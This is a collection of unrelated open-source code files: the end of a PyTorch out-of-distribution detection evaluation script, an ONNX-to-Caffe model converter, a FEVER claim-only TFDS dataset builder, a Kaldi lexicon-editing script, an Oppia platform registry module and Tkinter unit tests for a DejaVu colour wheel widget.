    checkpoint = torch.load('./checkpoint/'+args.dataset+os.sep+file_name+'.t7')
else :
    checkpoint = torch.load('./checkpoint/{}/{}/{}.t7'.format(args.dataset, args.check_point, os.sep+file_name))
    # checkpoint = torch.load('./checkpoint/{}/{}/{}.pth'.format(args.dataset, args.check_point, os.sep+file_name))
    # checkpoint = torch.load('./checkpoint/{}/{}/{}.pth'.format(args.dataset, args.check_point, os.sep+file_name),map_location='cuda:1')
net = checkpoint['net']
epoch = checkpoint['epoch']
# net = torch.load('./pretrained/wideresnet100.pth')['net']
# net = ResNet34(num_c=num_classes)
# net.load_state_dict(torch.load('./pretrained/resnet_cifar100.pth', map_location = "cuda:" + str(0)))
# net = torch.load('./pretrained/resnet_cifar100.pth', map_location = "cuda:" + str(0))
if use_cuda:
    net.cuda()
    # net = torch.nn.DataParallel(net, device_ids=range(torch.cuda.device_count()))
    # cudnn.benchmark = True
net.eval()
def generate_target():
    """Score the in-distribution test set and log confidences to args.outf.

    Writes per-sample confidence scores (overall / correct / wrong splits,
    plus sharing-node variants for the 'sharing*' modes) and returns the
    top-1 accuracy in percent.  Optionally applies ODIN temperature scaling
    (--odin) and input preprocessing perturbation (--input_preproc_noise_magni).
    Note: f5/f7 are opened but only written by commented-out code.
    """
    net.eval()
    correct = 0
    total = 0
    f1 = open('%s/confidence_Base_In.txt'%args.outf, 'w')
    f11 = open('%s/confidence_Base_In_correct.txt'%args.outf, 'w')
    f12 = open('%s/confidence_Base_In_wrong.txt'%args.outf, 'w')
    f3 = open('%s/confidence_Base_In_sharing_node.txt'%args.outf, 'w')
    f5 = open('%s/confidence_Base_In_sharing_node_of_correct_case.txt'%args.outf, 'w')
    f7 = open('%s/confidence_Base_In_sharing_node_of_wrong_case.txt'%args.outf, 'w')
    f9 = open('%s/confidence_Base_In_softmax_max_and_sharing_node.txt'%args.outf, 'w')
    for data, target in testloader:
        total += data.size(0)
        #vutils.save_image(data, '%s/target_samples.png'%args.outf, normalize=True)
        if use_cuda:
            data, target = data.cuda(), target.cuda()
        # data, target = Variable(data, volatile=True), Variable(target)
        data, target = Variable(data, requires_grad = True), Variable(target)
        full_output = net(data)
        # The first num_classes logits are the class scores; any extra column
        # (the "sharing"/OOD node) stays available through full_output.
        batch_output = full_output[:,:num_classes]
        if args.odin is not None :
            batch_output /= args.odin
        if args.input_preproc_noise_magni is not None :
            # ODIN-style input preprocessing: perturb the input against the
            # gradient of the loss w.r.t. the predicted label, then re-score.
            # print(args.input_preproc_noise_magni)
            maxIndexTemp = torch.argmax(batch_output, dim=1)
            labels = Variable(maxIndexTemp).cuda()
            # labels = target_transform_for_elementwise_bce(labels, 100)
            # loss = F.binary_cross_entropy_with_logits(batch_output, labels)
            loss = F.cross_entropy(F.softmax(batch_output), labels)
            loss.backward()
            # Normalizing the gradient to binary in {0, 1}
            gradient = torch.ge(data.grad.data, 0)
            # gradient = (gradient.float())
            gradient = (gradient.float() - 0.5) * 2
            # gradient = data.grad.data
            # Normalizing the gradient to the same space of image
            gradient[0][0] = (gradient[0][0]) / 0.2675
            gradient[0][1] = (gradient[0][1]) / 0.2565
            gradient[0][2] = (gradient[0][2]) / 0.2761
            # gradient[0][0] = (gradient[0][0] )/(63.0/255.0)
            # gradient[0][1] = (gradient[0][1] )/(62.1/255.0)
            # gradient[0][2] = (gradient[0][2])/(66.7/255.0)
            # Adding small perturbations to images
            tempInputs = torch.add(data.data, -args.input_preproc_noise_magni, gradient)
            batch_output = net(Variable(tempInputs))[:,:num_classes]
            if args.odin is not None :
                batch_output /= args.odin
        # compute the accuracy
        max_logit, pred = batch_output.data.max(1)
        equal_flag = pred.eq(target.data).cpu()
        correct += equal_flag.sum()
        for i in range(data.size(0)):
            # confidence score: max_y p(y|x)
            output = batch_output[i].view(1,-1)
            if args.mode == 'sigmoid':
                soft_out = F.sigmoid(output)
            elif args.mode == 'tanh':
                soft_out = F.tanh(output) / 2.0 + 0.5
            elif args.mode == 'clamp':
                soft_out = torch.clamp(output, min=-10, max=10) / 20.0 + 0.5
            elif args.mode == 'softmax':
                soft_out = F.softmax(output)
            elif args.mode == 'temper':
                soft_out = F.softmax((output - max_logit[i])/100.0)
            elif args.mode == 'sharing':
                # Two-way softmax between the max class logit and the sharing node.
                output = full_output[i].view(1,-1)
                sharing = output[0,-1].view(1,1)
                one_max_logit = max_logit[i].view(1,1)
                two_logits = torch.cat((one_max_logit, sharing), dim=1)
                soft_out = F.softmax(two_logits)
            elif args.mode == 'sharing_include_softmax' :
                output = full_output[i].view(1,-1)
                soft_out = F.softmax(output)
                f3.write("{:.4f}\n".format(soft_out[0, num_classes]))
                sharing = output[0,-1].view(1,1)
                one_max_logit = max_logit[i].view(1,1)
                two_logits = torch.cat((one_max_logit, sharing), dim=1)
                OOD_node_softmax = F.softmax(two_logits)
                f9.write("{:.4f}\n".format(OOD_node_softmax[0, -1]))
            elif args.mode == 'sharing_include_sigmoid' :
                output = full_output[i].view(1,-1)
                soft_out = F.sigmoid(output)
                f3.write("{:.4f}\n".format(soft_out[0, num_classes]))
            elif args.mode == 'only_sharing_node':
                soft_out = 1. - F.sigmoid(output[:,-1]).view(1,-1)
                # print(soft_out.size())
                # print(soft_out)
                # print(torch.max(soft_out.data))
                # exit()
            elif args.mode == 'sharing_node_print_include_softmax' :
                output = full_output[i].view(1,-1)
                soft_out = F.softmax(output)
                f9.write("{:.4f}\n".format(torch.max(soft_out[:,:num_classes].data)))
                sharing = output[0,-1].view(1,1)
                one_max_logit = max_logit[i].view(1,1)
                two_logits = torch.cat((one_max_logit, sharing), dim=1)
                soft_out = (1. - F.softmax(two_logits))[:,-1]
                f3.write("{:.4f}\n".format(float(soft_out.data.cpu())))
            else :
                assert()
            soft_out = torch.max(soft_out.data)
            f1.write("{}\n".format(soft_out))
            if pred[i] != target[i]:
                f12.write("{}\n".format(soft_out))
                # f7.write("{}\n".format(F.sigmoid(batch_output[i,num_classes]).item()))
            else :
                f11.write("{}\n".format(soft_out))
                # f5.write("{}\n".format(F.sigmoid(batch_output[i,num_classes]).item()))
            # f1.write("{}\n".format(F.sigmoid(batch_output[i,num_classes]).item()))
    print('\n Final Accuracy: {}/{} ({:.2f}%)\n'.format(correct, total, 100. * float(correct) / float(total)))
    return 100. * float(correct) / float(total)
def generate_non_target():
    """Score the out-of-distribution loader and log confidences to args.outf.

    Mirrors :func:`generate_target` but over ``nt_test_loader``: writes the
    per-sample confidence, the predicted (in-distribution) class, the
    sharing-node variants, and a histogram of predicted classes.  No accuracy
    is computed since the labels come from a different label space.
    """
    net.eval()
    total = 0
    f2 = open('%s/confidence_Base_Out.txt'%args.outf, 'w')
    f4 = open('%s/confidence_Base_Out_sharing_node.txt'%args.outf, 'w')
    f6 = open('%s/confidence_Base_Out_what_infer.txt'%args.outf, 'w')
    # f8 = open('%s/confidence_Base_Out_sharing_node.txt'%args.outf, 'w')
    f10 = open('%s/confidence_Base_Out_softmax_max_and_sharing_node.txt'%args.outf, 'w')
    f12 = open('%s/bag_of_out_of_distrib.txt'%args.outf, 'w')
    # Per-class count of predictions made on OOD samples.
    bags = torch.zeros([num_classes]).cuda()
    for data, target in nt_test_loader:
        total += data.size(0)
        if use_cuda:
            data, target = data.cuda(), target.cuda()
        # data, target = Variable(data, volatile=True), Variable(target)
        data, target = Variable(data, requires_grad = True), Variable(target)
        full_output = net(data)
        batch_output = full_output[:,:num_classes]
        if args.odin is not None :
            batch_output /= args.odin
        if args.input_preproc_noise_magni is not None :
            # ODIN-style input preprocessing, identical to generate_target.
            maxIndexTemp = torch.argmax(batch_output, dim=1)
            labels = Variable(maxIndexTemp).cuda()
            # labels = target_transform_for_elementwise_bce(labels, 100)
            # loss = F.binary_cross_entropy_with_logits(batch_output, labels)
            loss = F.cross_entropy(F.softmax(batch_output), labels)
            loss.backward()
            # Normalizing the gradient to binary in {0, 1}
            gradient = torch.ge(data.grad.data, 0)
            # gradient = (gradient.float())
            gradient = (gradient.float() - 0.5) * 2
            # gradient = data.grad.data
            # Normalizing the gradient to the same space of image
            gradient[0][0] = (gradient[0][0] )/ 0.2675
            gradient[0][1] = (gradient[0][1] )/ 0.2565
            gradient[0][2] = (gradient[0][2])/ 0.2761
            # gradient[0][0] = (gradient[0][0] )/(63.0/255.0)
            # gradient[0][1] = (gradient[0][1] )/(62.1/255.0)
            # gradient[0][2] = (gradient[0][2])/(66.7/255.0)
            # Adding small perturbations to images
            tempInputs = torch.add(data.data, -args.input_preproc_noise_magni, gradient)
            batch_output = net(Variable(tempInputs))[:,:num_classes]
            if args.odin is not None :
                batch_output /= args.odin
        max_logit, pred = batch_output.data.max(1)
        bags += count(pred, num_classes)
        for i in range(data.size(0)):
            # confidence score: max_y p(y|x)
            output = batch_output[i].view(1,-1)
            if args.mode == 'sigmoid':
                soft_out = F.sigmoid(output)
            elif args.mode == 'tanh':
                soft_out = F.tanh(output) / 2.0 + 0.5
            elif args.mode == 'clamp':
                soft_out = torch.clamp(output, min=-10, max=10) / 20.0 + 0.5
            elif args.mode == 'softmax':
                soft_out = F.softmax(output)
            elif args.mode == 'temper':
                soft_out = F.softmax((output - max_logit[i])/100.0)
            elif args.mode == 'sharing':
                output = full_output[i].view(1,-1)
                sharing = output[0,-1].view(1,1)
                one_max_logit = max_logit[i].view(1,1)
                two_logits = torch.cat((one_max_logit, sharing), dim=1)
                soft_out = F.softmax(two_logits)
            elif args.mode == 'sharing_include_softmax' :
                output = full_output[i].view(1,-1)
                soft_out = F.softmax(output)
                f4.write("{:.4f}\n".format(soft_out[0, num_classes]))
                sharing = output[0,-1].view(1,1)
                one_max_logit = max_logit[i].view(1,1)
                two_logits = torch.cat((one_max_logit, sharing), dim=1)
                OOD_node_softmax = F.softmax(two_logits)
                f10.write("{:.4f}\n".format(OOD_node_softmax[0, -1]))
            elif args.mode == 'sharing_include_sigmoid' :
                output = full_output[i].view(1,-1)
                soft_out = F.sigmoid(output)
                f4.write("{:.4f}\n".format(soft_out[0, num_classes]))
            elif args.mode == 'only_sharing_node':
                soft_out = 1. - F.sigmoid(output[:,-1]).view(1,-1)
            elif args.mode == 'sharing_node_print_include_softmax' :
                output = full_output[i].view(1,-1)
                soft_out = F.softmax(output)
                f10.write("{:.4f}\n".format(torch.max(soft_out[:,:num_classes].data)))
                sharing = output[0,-1].view(1,1)
                one_max_logit = max_logit[i].view(1,1)
                two_logits = torch.cat((one_max_logit, sharing), dim=1)
                soft_out = (1. - F.softmax(two_logits))[:,-1]
                f4.write("{:.4f}\n".format(float(soft_out.data.cpu())))
            else :
                assert()
            # print(soft_out.sum())
            soft_out = torch.max(soft_out.data)
            # if pred[i] == 2 or pred[i] == 3 or pred[i] ==5:
            #     pass
            # else :
            f2.write("{}\n".format(soft_out))
            # f2.write("{}\n".format(F.sigmoid(batch_output[i,num_classes]).item()))
            # if soft_out > 0.9 :
            f6.write("{}\n".format(pred[i]))
            # f8.write("{}\n".format(F.sigmoid(batch_output[i,num_classes]).item()))
    f12.write("{}".format(bags.clone().cpu().data.detach().numpy()))
    # NOTE(review): ``mode`` is only assigned for 'sigmoid'/'softmax'; other
    # --mode values reach write_output with ``mode`` undefined (NameError).
    if args.out_dataset == 'cifar100':
        if args.mode == 'sigmoid':
            mode = 'bce'
        elif args.mode == 'softmax':
            mode = 'ce'
        write_output(batch_output, target, args.outf, 0, num_classes=100, mode=mode, cifar100=True)
# Driver: log confidences for both distributions, then compute the OOD
# detection metrics from the written files.
print('generate log from in-distribution data')
acc = generate_target()
print('generate log from out-of-distribution data')
generate_non_target()
print('calculate metrics')
callog.metric(args.outf, acc)
| 2.046875 | 2 |
convertCaffe.py | AntiAegis/onnx2caffe | 1 | 12766415 | <filename>convertCaffe.py
#------------------------------------------------------------------------------
# Libraries
#------------------------------------------------------------------------------
import numpy as np
import argparse, sys, caffe, onnx, importlib
from caffe.proto import caffe_pb2
caffe.set_mode_cpu()
from onnx import shape_inference
from onnx2caffe._graph import Graph
import onnx2caffe._operators as cvt
import onnx2caffe._weightloader as wlr
from onnx2caffe._error_utils import ErrorHandling
from onnx2caffe._transformers import ConvAddFuser,ConstantsToInitializers
from collections import OrderedDict
transformers = [
ConstantsToInitializers(),
ConvAddFuser(),
]
#------------------------------------------------------------------------------
# convertToCaffe
#------------------------------------------------------------------------------
def convertToCaffe(graph, prototxt_save_path, caffe_model_save_path):
    """Convert an ONNX graph to Caffe, writing a .prototxt and a .caffemodel.

    Args:
        graph: Graph produced by getGraph() from an ONNX model.
        prototxt_save_path: destination path for the network definition.
        caffe_model_save_path: destination path for the converted weights.

    Returns:
        The instantiated caffe.Net with weights copied in.
    """
    exist_edges = []   # blob names already produced by emitted layers
    layers = []        # Caffe layer specs, in topological order
    exist_nodes = []   # NOTE(review): appears unused — confirm before removing
    err = ErrorHandling()
    # Emit one Input layer per graph input and record its channel count,
    # which downstream converters read from graph.channel_dims.
    for i in graph.inputs:
        edge_name = i[0]
        input_layer = cvt.make_input(i)
        layers.append(input_layer)
        exist_edges.append(i[0])
        graph.channel_dims[edge_name] = graph.shape_dict[edge_name][1]
    # First pass: translate each ONNX node into one or more Caffe layers.
    for id, node in enumerate(graph.nodes):
        node_name = node.name
        op_type = node.op_type
        inputs = node.inputs
        inputs_tensor = node.input_tensors
        input_non_exist_flag = False
        # Skip nodes whose inputs are neither produced edges nor weights.
        for inp in inputs:
            if inp not in exist_edges and inp not in inputs_tensor:
                input_non_exist_flag = True
                break
        if input_non_exist_flag:
            continue
        if op_type not in cvt._ONNX_NODE_REGISTRY:
            err.unsupported_op(node)
            continue
        converter_fn = cvt._ONNX_NODE_REGISTRY[op_type]
        layer = converter_fn(node,graph,err)
        # A converter may return a tuple of layers (e.g. for fused ops).
        if type(layer)==tuple:
            for l in layer:
                layers.append(l)
        else:
            layers.append(layer)
        outs = node.outputs
        for out in outs:
            exist_edges.append(out)
    # Serialize the layer definitions to the prototxt file.
    net = caffe_pb2.NetParameter()
    for id,layer in enumerate(layers):
        layers[id] = layer._to_proto()
    net.layer.extend(layers)
    with open(prototxt_save_path, 'w') as f:
        print(net,file=f)
    caffe.set_mode_cpu()
    deploy = prototxt_save_path
    net = caffe.Net(deploy,
                    caffe.TEST)
    # Second pass: copy ONNX weights into the instantiated Caffe net.
    for id, node in enumerate(graph.nodes):
        node_name = node.name
        op_type = node.op_type
        inputs = node.inputs
        inputs_tensor = node.input_tensors
        input_non_exist_flag = False  # NOTE(review): set but never used here
        if op_type not in wlr._ONNX_NODE_REGISTRY:
            err.unsupported_op(node)
            continue
        converter_fn = wlr._ONNX_NODE_REGISTRY[op_type]
        converter_fn(net, node, graph, err)
    net.save(caffe_model_save_path)
    return net
#------------------------------------------------------------------------------
# getGraph
#------------------------------------------------------------------------------
def getGraph(onnx_path):
    """Load an ONNX model from *onnx_path* and return a transformed Graph.

    Shape inference is run first so that graph.shape_dict is populated, then
    the module-level transformer passes are applied.
    """
    inferred_model = shape_inference.infer_shapes(onnx.load(onnx_path))
    graph = Graph.from_onnx(inferred_model.graph).transformed(transformers)
    graph.channel_dims = {}
    return graph
#------------------------------------------------------------------------------
# Main execution
#------------------------------------------------------------------------------
if __name__ == "__main__":
    # Argument parsing
    parser = argparse.ArgumentParser(description="Arguments for the script")
    parser.add_argument('--onnx_file', type=str, required=True, help='Path to the ONNX file')
    args = parser.parse_args()
    # Prepare paths
    # NOTE: assumes the input path ends with ".onnx"; otherwise the outputs
    # are written next to the unchanged input path.
    onnx_path = args.onnx_file
    prototxt_path = onnx_path.replace(".onnx", ".prototxt")
    caffemodel_path = onnx_path.replace(".onnx", ".caffemodel")
    # Convert ONNX to Caffe
    graph = getGraph(onnx_path)
    convertToCaffe(graph, prototxt_path, caffemodel_path)
    print("Converted Caffe model is saved at %s and %s" % (prototxt_path, caffemodel_path))
| 2.078125 | 2 |
language/serene/claim_tfds.py | Xtuden-com/language | 1,199 | 12766416 | <gh_stars>1000+
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""TFDS for only claims."""
import json
from language.serene import constants
from language.serene import util
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
class ClaimDataset(tfds.core.GeneratorBasedBuilder):
  """Claim only datasets for fever, useful for embedding only claims.

  Wraps the FEVER train/dev jsonlines files as a TFDS dataset whose examples
  carry only the claim text; all evidence fields are emitted empty so the
  feature schema stays compatible with the evidence-matching datasets.
  """
  VERSION = tfds.core.Version("0.1.0")
  def __init__(
      self, *,
      fever_train_path = None,
      fever_dev_path = None,
      data_dir = None,
      config=None):
    # Paths to the FEVER claim jsonlines files; read lazily by
    # _generate_examples via the split generators below.
    super().__init__(data_dir=data_dir, config=config)
    self._fever_train_path = fever_train_path
    self._fever_dev_path = fever_dev_path
  def _info(self):
    # Feature schema mirrors the evidence-matching datasets so downstream
    # models can consume either; evidence fields are always empty here.
    return tfds.core.DatasetInfo(
        builder=self,
        features=tfds.features.FeaturesDict({
            "example_id":
                tf.string,
            "metadata":
                tf.string,
            "claim_text":
                tfds.features.Text(),
            "evidence_text":
                tfds.features.Text(),
            "wikipedia_url":
                tfds.features.Text(),
            "sentence_id":
                tfds.features.Text(),
            "scrape_type":
                tfds.features.Text(),
            "evidence_label":
                tfds.features.ClassLabel(
                    names=constants.EVIDENCE_MATCHING_CLASSES),
            "claim_label":
                tfds.features.ClassLabel(names=constants.FEVER_CLASSES)
        }))
  def _split_generators(self, dl_manager):
    # dl_manager is unused: files come from the constructor paths directly.
    return [
        tfds.core.SplitGenerator(
            name=tfds.Split.TRAIN,
            gen_kwargs={"filepath": self._fever_train_path}
        ),
        tfds.core.SplitGenerator(
            name=tfds.Split.VALIDATION,
            gen_kwargs={"filepath": self._fever_dev_path}
        )
    ]
  def _generate_examples(self, filepath, **kwargs):
    """Yield (claim_id, example) pairs, one per claim in the jsonlines file."""
    fever_claims = util.read_jsonlines(filepath)
    for claim in fever_claims:
      claim_id = claim["id"]
      claim_text = claim["claim"]
      claim_label = claim["label"]
      example_id = f"{claim_id}"
      yield claim_id, {
          "example_id": example_id,
          "claim_text": claim_text,
          "evidence_text": "",
          "wikipedia_url": "",
          # Ordinarily, this would (possibly) be concatenated to the evidence
          # but since this is claim only, I'm using a null integer value
          "sentence_id": "-1",
          # This label doesn't matter here since its claim only
          "evidence_label": constants.NOT_MATCHING,
          "claim_label": claim_label,
          "scrape_type": "",
          "metadata": json.dumps({
              "claim_id": claim_id,
          })
      }
| 2.109375 | 2 |
kaldi/steps/dict/apply_lexicon_edits.py | ishine/asv-subtools | 370 | 12766417 | #!/usr/bin/env python
# Copyright 2016 <NAME>
# Apache 2.0.
from __future__ import print_function
import argparse
import sys
def GetArgs():
    """Parse command-line arguments, echo them to stderr, and return the
    namespace with opened file handles attached (see CheckArgs)."""
    parser = argparse.ArgumentParser(description = "Apply an lexicon edits file (output from subtools/kaldi/steps/dict/select_prons_bayesian.py)to an input lexicon"
                                     "to produce a learned lexicon.",
                                     epilog = "See subtools/kaldi/steps/dict/learn_lexicon_greedy.sh for example")
    parser.add_argument("in_lexicon", metavar='<in-lexicon>', type = str,
                        help = "Input lexicon. Each line must be <word> <phones>.")
    parser.add_argument("lexicon_edits_file", metavar='<lexicon-edits-file>', type = str,
                        help = "Input lexicon edits file containing human-readable & editable"
                        "pronounciation info. The info for each word is like:"
                        "------------ an 4086.0 --------------"
                        "R | Y | 2401.6 | AH N"
                        "R | Y | 640.8 | AE N"
                        "P | Y | 1035.5 | IH N"
                        "R(ef), P(hone-decoding) represents the pronunciation source"
                        "Y/N means the recommended decision of including this pron or not"
                        "and the numbers are soft counts accumulated from lattice-align-word outputs. See subtools/kaldi/steps/dict/select_prons_bayesian.py for more details.")
    parser.add_argument("out_lexicon", metavar='<out-lexicon>', type = str,
                        help = "Output lexicon to this file.")
    # Log the exact invocation for reproducibility (Kaldi script convention).
    print (' '.join(sys.argv), file=sys.stderr)
    args = parser.parse_args()
    args = CheckArgs(args)
    return args
def CheckArgs(args):
    """Open the file handles referenced by the parsed arguments.

    "-" for the input lexicon means read from stdin; "-" for the output
    lexicon means write to stdout.  The opened handles are attached to the
    namespace as ``*_handle`` attributes and the namespace is returned.

    Raises:
        IOError/OSError: if a named file cannot be opened.
    """
    if args.in_lexicon == "-":
        # Bug fix: previously only args.in_lexicon was reassigned to stdin and
        # args.in_lexicon_handle was left unset, crashing later in Main().
        args.in_lexicon_handle = sys.stdin
    else:
        args.in_lexicon_handle = open(args.in_lexicon)
    args.lexicon_edits_file_handle = open(args.lexicon_edits_file)
    if args.out_lexicon == "-":
        args.out_lexicon_handle = sys.stdout
    else:
        args.out_lexicon_handle = open(args.out_lexicon, "w")
    return args
def ReadLexicon(lexicon_file_handle):
    """Parse "<word> <phones...>" lines into a set of (word, pron) tuples.

    Blank lines are skipped; a non-empty line with fewer than two fields is an
    error.  A falsy handle yields an empty set.
    """
    lexicon = set()
    if not lexicon_file_handle:
        return lexicon
    for line in lexicon_file_handle.readlines():
        fields = line.strip().split()
        if not fields:
            continue
        if len(fields) < 2:
            raise Exception('Invalid format of line ' + line
                            + ' in lexicon file.')
        lexicon.add((fields[0], ' '.join(fields[1:])))
    return lexicon
def ApplyLexiconEdits(lexicon, lexicon_edits_file_handle):
    """Apply Y(add)/N(remove) pronunciation decisions from an edits file.

    The edits file alternates word headers like "---- WORD 42.0 ----" with
    pron lines like "R | Y | 2.0 | F UW"; '#' lines are comments.  *lexicon*
    (a set of (word, pron) tuples) is mutated in place and also returned.
    """
    if not lexicon_edits_file_handle:
        return lexicon
    for line in lexicon_edits_file_handle.readlines():
        # Commented lines carry no decisions.
        if line.startswith('#'):
            continue
        if line.startswith('---'):
            # Word header: "---- MICROPHONES 200.0 ----" -> word, soft count.
            header = line.strip().strip('-').strip().split()
            if len(header) != 2:
                print(header, file=sys.stderr)
                raise Exception('Invalid format of line ' + line
                                + ' in lexicon edits file.')
            word = header[0].strip()
            continue
        # Pron line: "<source> | <Y/N> | <count> | <phones>".
        fields = line.split('|')
        if len(fields) != 4:
            raise Exception('Invalid format of line ' + line
                            + ' in lexicon edits file.')
        pron = fields[3].strip()
        decision = fields[1].strip()
        if decision == 'Y':
            lexicon.add((word, pron))
        elif decision == 'N':
            lexicon.discard((word, pron))
        else:
            raise Exception('Invalid format of line ' + line
                            + ' in lexicon edits file.')
    return lexicon
def WriteLexicon(lexicon, out_lexicon_handle):
    """Write each (word, pron) entry as "<word> <pron>" and close the handle."""
    for word, pron in lexicon:
        out_lexicon_handle.write('{0} {1}'.format(word, pron) + '\n')
    out_lexicon_handle.close()
def Main():
    """Read the input lexicon, apply the edits file, write the learned lexicon."""
    args = GetArgs()
    lexicon = ReadLexicon(args.in_lexicon_handle)
    ApplyLexiconEdits(lexicon, args.lexicon_edits_file_handle)
    WriteLexicon(lexicon, args.out_lexicon_handle)
if __name__ == "__main__":
    Main()
| 3 | 3 |
core/platform/platform_services.py | ctao5660/oppia-ml | 3 | 12766418 | # coding: utf-8
#
# Copyright 2017 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Interface for platform services switching."""
import vmconf
class _Gce(object):
"""Provides platform-specific imports related to GCE
(Google Compute Engine).
"""
@classmethod
def import_metadata_services(cls):
"""Imports and returns gce_metadata_services module.
Returns:
module. The gce_metadata_services module.
"""
from core.platform.metadata import gce_metadata_services
return gce_metadata_services
NAME = 'gce'
class Registry(object):
    """Platform-agnostic interface for retrieving platform-specific modules."""

    # Maps platform names to the corresponding module registry classes.
    _PLATFORM_MAPPING = {
        _Gce.NAME: _Gce,
    }

    @classmethod
    def _get(cls):
        """Return the registry class configured for the current platform.

        Returns:
            class. The corresponding platform-specific interface class.
        """
        platform_name = vmconf.PLATFORM
        return cls._PLATFORM_MAPPING.get(platform_name)

    @classmethod
    def import_metadata_services(cls):
        """Import and return the metadata_services module for this platform.

        Returns:
            module. The metadata_services module.
        """
        platform_registry = cls._get()
        return platform_registry.import_metadata_services()
| 1.921875 | 2 |
cellpack/mgl_tools/DejaVu/Tests/test_ColorWheel.py | mesoscope/cellpack | 0 | 12766419 | ## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by
#
#
# $Id: test_ColorWheel.py,v 1.5 2007/12/28 22:50:04 vareille Exp $
#
#
import Tkinter
import numpy
import numpy.oldnumeric as Numeric, math
import DejaVu.colorTool
import DejaVu.Slider
from DejaVu.EventHandler import CallbackFunctions
import unittest
from DejaVu.ColorWheel import ColorWheel
from DejaVu.colorTool import ToRGB,ToHSV
def MyCallback(color):
    # Test callback: echo the colour value passed in by the colour wheel.
    print color
def MyCallback2(color):
    # Second, distinct callback so tests can register multiple callbacks.
    print 'hello'
class ColorWheel_BaseTests(unittest.TestCase):
    """GUI tests for DejaVu's ColorWheel widget.

    Python 2 / Tkinter code: each test creates a Tk root, exercises one
    ColorWheel behaviour (visibility, callbacks, cursor, colour get/set,
    Wysiwyg mode, constructor keywords) and destroys the root.  Requires a
    display to run.
    """
    def test_colorwheel_visible(self):
        """check that one colorwheel is visible after building 3
        """
        root = Tkinter.Tk()
        cw = ColorWheel(root)
        cw.AddCallback(MyCallback)
        cw1 = ColorWheel(root, immediate=0)
        cw1.AddCallback(MyCallback2)
        cw2 = ColorWheel(root, immediate=0)
        # NOTE(review): this re-registers on cw1; was cw2.AddCallback intended?
        cw1.AddCallback(MyCallback)
        cw2.AddCallback(MyCallback2)
        root.wait_visibility(cw.canvas)
        root.wait_visibility(cw1.canvas)
        root.wait_visibility(cw2.canvas)
        self.assertEqual(cw.canvas.master.winfo_ismapped(),True)
        self.assertEqual(root.winfo_ismapped(),True)
        root.destroy()
    def test_colorwheel_add_remove_callback(self):
        # Registering then removing a callback should leave the list empty.
        root = Tkinter.Tk()
        cw = ColorWheel(root)
        cw.AddCallback(MyCallback)
        root.wait_visibility(cw.canvas)
        self.assertEqual(len(cw.callbacks),1)
        cw.RemoveCallback(MyCallback)
        self.assertEqual(len(cw.callbacks),0)
        root.destroy()
    def test_colorwheel_height(self):
        """check height of colorwheel
        """
        root = Tkinter.Tk()
        cw = ColorWheel(root)
        cw.height = 120
        cw.AddCallback(MyCallback)
        root.wait_visibility(cw.canvas)
        #apparently there is a 10 pixel border on each edge:
        self.assertEqual(cw.canvas.cget('height'), str(100))
        root.destroy()
    def test_colorwheel_cursor(self):
        """tests color wheel,moving cursor
        """
        root = Tkinter.Tk()
        cw = ColorWheel(root)
        old_x = cw.cursorX
        old_y = cw.cursorY
        cw._MoveCursor(25,25)
        new_x = cw.cursorX
        new_y = cw.cursorY
        root.wait_visibility(cw.canvas)
        # Cursor coordinates must have changed after the move.
        self.assertEqual(old_x != new_x,True)
        self.assertEqual(old_y != new_y,True)
        root.destroy()
    def test_colorwheel_color_1(self):
        """test colorwheel,colors after moving cursor
        """
        root = Tkinter.Tk()
        cw = ColorWheel(root)
        old_color = cw.hsvColor
        cw._MoveCursor(25,25)
        new_color = cw.hsvColor
        root.wait_visibility(cw.canvas)
        #self.assertEqual(old_color,new_color)
        self.assertTrue(numpy.alltrue(old_color==new_color))
        # Setting pure red via RGB should round-trip through Get().
        cw.Set((1.0,0.0,0.0),mode = 'RGB')
        mycolor = ToRGB(cw.Get())
        mycol =[]
        for i in range(0,4):
            mycol.append(round(mycolor[i]))
        self.assertEqual(mycol,[1.0,0.0,0.0,1.0])
        root.destroy()
    def test_colorwheel_color_HSV(self):
        """test colorwheel,when mode is hsv
        """
        root = Tkinter.Tk()
        cw = ColorWheel(root)
        cw.Set((1.0,0.0,0.0),mode = 'HSV')
        root.wait_visibility(cw.canvas)
        self.assertEqual(cw.hsvColor,[1.0, 0.0, 0.0, 1.0])
        self.assertEqual(cw.cursorX,50)
        self.assertEqual(cw.cursorY,50)
        root.destroy()
    def test_colorwheel_color_RGB(self):
        """test colorwheel,when mode is rgb
        """
        root = Tkinter.Tk()
        cw = ColorWheel(root)
        cw.Set((1.0,0.0,0.0),mode = 'RGB')
        root.wait_visibility(cw.canvas)
        self.assertEqual(cw.cursorX,100)
        self.assertEqual(cw.cursorY,50)
        # Stored HSV colour differs from the RGB triple that was set.
        self.assertEqual(cw.hsvColor[:3] != [1.0, 0.0, 0.0],True)
        root.destroy()
    def test_colorwheel_Wysiwyg(self):
        """test colorwheel,when Wysiwyg On
        """
        root = Tkinter.Tk()
        cw = ColorWheel(root)
        cw.Set((1.0,0.0,0.0),mode = 'HSV')
        #when on wheel colors are recomputed
        cw.setWysiwyg(1)
        root.wait_visibility(cw.canvas)
        self.assertEqual(cw.hsvColor == [1.0, 0.0, 0.0, 1.0],True)
        cw.setWysiwyg(0)
        #root.wait_visibility(cw.canvas)
        self.assertEqual(cw.hsvColor[:3] != [1.0, 0.0, 0.0],True)
        root.destroy()
    def test_colorwheel_keyword_arguements(self):
        """tests setting keyword arguements in colorwheel
        """
        root = Tkinter.Tk()
        cw = ColorWheel(root,circles = 20,stripes = 20,width =160,height =160)
        self.assertEqual(cw.circles,20)
        self.assertEqual(cw.width,160)
